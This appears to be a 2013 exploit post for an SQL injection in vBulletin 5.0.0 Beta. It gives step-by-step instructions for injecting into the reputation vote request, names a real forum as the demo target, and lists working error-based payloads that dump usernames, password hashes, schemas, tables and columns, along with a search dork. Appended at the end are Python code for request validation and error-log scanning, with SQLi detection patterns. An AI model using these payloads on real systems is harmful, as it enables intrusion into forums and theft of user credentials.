Created December 3, 2013 11:33
vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day
#Category: web application
#Type: SQL Injection
#Requirements: Firefox/Live HTTP Headers/
#Dork: Powered by vBulletin™ Version 5.0.0 Beta (or) Use ur Brain you'll get more o_O
Step 1
Create an account on the vBulletin forum, verify the account and activate it.
For the demo we will use this forum:
Link = http://www.prospectrush.com/new_forum/
I have already made an account, so I will log in directly.
Step 2
Open any topic and open Live HTTP Headers (download it from https://addons.mozilla.org/en/firefox/addon/live-http-headers/).
Then, on the topic page, find the "Like" button and click on it.
The HTTP response will then be caught by the Live HTTP Headers add-on.
Step 3
Go to the first POST in Live HTTP Headers; it will look like this:
POST *Something /ajax/api/reputation/vote HTTP/1.1
Select it and click on the Replay button.
Step 4
Then go to Send POST Content and use the query below;
just add the query below after "noteid=somenumber".
=======================
SQL Query
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
=======================
The above SQLi command will fetch the first record from the user table (username/password).
You will see the username and the password in encrypted form; get the salt too and decrypt it. I won't show the decrypting, use your brain :)
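A server-side check for the request described in Steps 3 and 4, as an added example that is not part of the original gist and is not vBulletin's code: it accepts the vote request only when the id field is a plain integer, and records which fragments of the query above were present for triage. The field name `noteid` and the endpoint path are taken from this page; `inspect_vote_request`, `MARKERS` and the sample requests are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl

VOTE_PATH = "/ajax/api/reputation/vote"  # endpoint named on this page
ID_FIELD = "noteid"                      # field name as written on this page

# Fragments common to every query listed on this page.
MARKERS = {
    "floor-rand": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "information_schema": re.compile(r"information_schema", re.I),
    "group-by": re.compile(r"group\s+by", re.I),
    "hex-delimiter": re.compile(r"0x7e", re.I),
    "subselect": re.compile(r"\(\s*select\b", re.I),
}

def inspect_vote_request(method, path, body, id_field=ID_FIELD):
    """Return (allow, reasons); requests to other endpoints pass untouched."""
    if method.upper() != "POST" or not path.split("?")[0].endswith(VOTE_PATH):
        return True, []
    values = [v for k, v in parse_qsl(body, keep_blank_values=True) if k == id_field]
    reasons = []
    if len(values) != 1:
        reasons.append(f"{id_field} supplied {len(values)} times")
    for value in values:
        if re.fullmatch(r"[0-9]{1,10}", value):
            continue  # the only shape an id should ever have
        reasons.append(f"{id_field} is not a plain integer")
        # Markers are for triage only; the integer check is what blocks.
        reasons += [f"marker:{n}" for n, rx in MARKERS.items() if rx.search(value)]
    return not reasons, reasons

# Constructed request bodies (not captured traffic); the second is abbreviated.
SAMPLES = [
    ("POST", "/forum/ajax/api/reputation/vote", "noteid=4312"),
    ("POST", "/forum/ajax/api/reputation/vote",
     "noteid=4312) and(select 1 from(select count(*),concat(0x7e,floor(rand(0)*2))x "
     "from information_schema.tables group by x)a"),
    ("POST", "/forum/ajax/api/reputation/vote", "noteid=4312&noteid=7"),
    ("GET", "/forum/index.php", ""),
]

if __name__ == "__main__":
    for method, path, body in SAMPLES:
        print(inspect_vote_request(method, path, body))
```

The integer check rejects the value before it can reach a query; the same field should still be bound as a parameter in the database layer.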
=============
Greets to Real Author , All Indian & Pakistani Brothers , 1337day , ashiyane forums & All Indian Hacking Groups
//Note : Those Brothers who have my mail id can Contact me for other Deals
Offer Valid till 29th March 2013
Regards
./NoTty_rAJ
Thanks
[#Other SQLi Syntaxes]
*********************************************************************************************************************
|Version():
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
|User():
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
|Database():
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
|Database Print:
) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
|Table Count:
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
|Print Tables:
) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
|Columns of selected table:
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
|Fetch Out Data:
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x 7e) FROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
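Every query in this list shares one skeleton (count(*), floor(rand(0)*2), group by) and returns its data inside a MySQL duplicate-key error, so the database or application error log is where it shows up. The scanner below is an added example, not part of the original gist: it finds those errors and reports which values were exposed without copying a second leaked column into the report. The log line layout, the `client=` field and the sample lines are constructed, and the `group_key` key name is an assumption about how the server words the error.

```python
import re

# MySQL error 1062 raised by the floor(rand(0)*2) ... GROUP BY trick; the
# "duplicate" key is the string the injected concat() built.
# Assumption: the server reports the temporary key as group_key or <group_key>.
DUP_ENTRY = re.compile(r"Duplicate entry '(?P<entry>.*)' for key '<?group_key>?'")
# Queries on this page wrap output as ~'value'~ (0x7e,0x27 ... 0x27,0x7e),
# optionally followed by a second column, then the 0/1 digit from floor().
LEAK = re.compile(r"^~'(?P<first>[^']*)'~(?:(?P<second>[^']*)'~)?[01]$")
CLIENT = re.compile(r"\bclient=(?P<ip>\S+)")  # constructed log field

def scan_error_log(lines):
    """Return one finding per log line that shows error-based extraction."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        dup = DUP_ENTRY.search(line)
        if not dup:
            continue  # ordinary duplicate-key errors name a real index
        # A truncated entry will not match LEAK but is still reported.
        leak = LEAK.match(dup.group("entry"))
        client = CLIENT.search(line)
        findings.append({
            "line": lineno,
            "client": client.group("ip") if client else None,
            "wrapped": bool(leak),
            "first_field": leak.group("first") if leak else None,
            # Record that a second column leaked, never its content.
            "second_field_len": len(leak.group("second") or "") if leak else 0,
        })
    return findings

def exposed_first_fields(findings):
    """Values for scoping, e.g. usernames whose password column was read."""
    return sorted({f["first_field"] for f in findings if f["second_field_len"]})

# Constructed sample log lines (hypothetical application error-log format).
SAMPLE_LOG = [
    "2013-12-03 11:40:02 client=203.0.113.7 err=1062 Duplicate entry '~'5.5.31'~1' for key 'group_key'",
    "2013-12-03 11:40:09 client=203.0.113.7 err=1062 Duplicate entry '~'admin'~0123456789abcdef'~1' for key 'group_key'",
    "2013-12-03 11:41:30 client=198.51.100.4 err=1062 Duplicate entry 'bob@example.org' for key 'email'",
]

if __name__ == "__main__":
    for finding in scan_error_log(SAMPLE_LOG):
        print(finding)
    print("reset credentials for:", exposed_first_fields(scan_error_log(SAMPLE_LOG)))
```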